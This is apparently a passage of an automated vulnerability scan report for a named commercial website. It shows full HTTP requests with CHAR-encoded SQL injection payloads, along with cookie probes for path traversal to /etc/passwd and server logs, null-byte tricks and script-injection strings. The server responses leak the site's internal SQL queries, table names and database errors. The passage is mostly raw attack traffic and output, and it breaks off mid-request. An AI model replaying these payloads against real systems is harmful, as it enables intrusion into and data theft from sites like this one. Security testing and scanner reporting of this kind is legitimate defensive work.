syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/lodi00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q2ftsggmpem9ckgjsam91hss84; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gl0kppmln10thkr3lhe37qd3a6; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 